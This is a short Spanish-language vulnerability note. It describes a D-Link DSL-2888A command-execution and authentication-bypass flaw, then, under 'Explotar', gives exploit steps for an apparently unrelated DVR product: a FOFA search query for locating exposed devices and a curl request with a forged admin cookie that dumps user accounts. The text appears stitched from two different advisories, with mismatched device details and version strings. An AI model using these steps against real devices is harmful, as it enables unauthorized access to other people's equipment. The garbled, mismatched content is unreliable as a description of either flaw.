Detalles de la vulnerabilidad
Existen versiones anteriores de D-Link DSL-2888A AU_2.31_V1.1.47ae55 y la vulnerabilidad de ejecución remota de comandos se debe a la inclusión de una función de ejecución cmd.cgi (no accesible a través de la interfaz de usuario web), que permite a los usuarios autenticados ejecutar Comandos del sistema operativo. También existe una vulnerabilidad de autenticación insegura (CVE-2020-24580) en esta versión del firmware. Ingrese cualquier contraseña en la interfaz de inicio de sesión para acceder con éxito a la interfaz del enrutador. Al combinar estas dos vulnerabilidades, se puede lograr la ejecución de código arbitrario no autorizado.
Impacto de la vulnerabilidad
Versión anterior a AU_2.31_V1.1.47ae55
EG_1.00b4
Explotar
fofa: header = "Servidor: GNU rsp / 1.0" title = "DVR LOGIN"
curl "http://ip/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
El nombre de usuario admin se obtiene aquí y la contraseña está vacía, por lo que puede iniciar sesión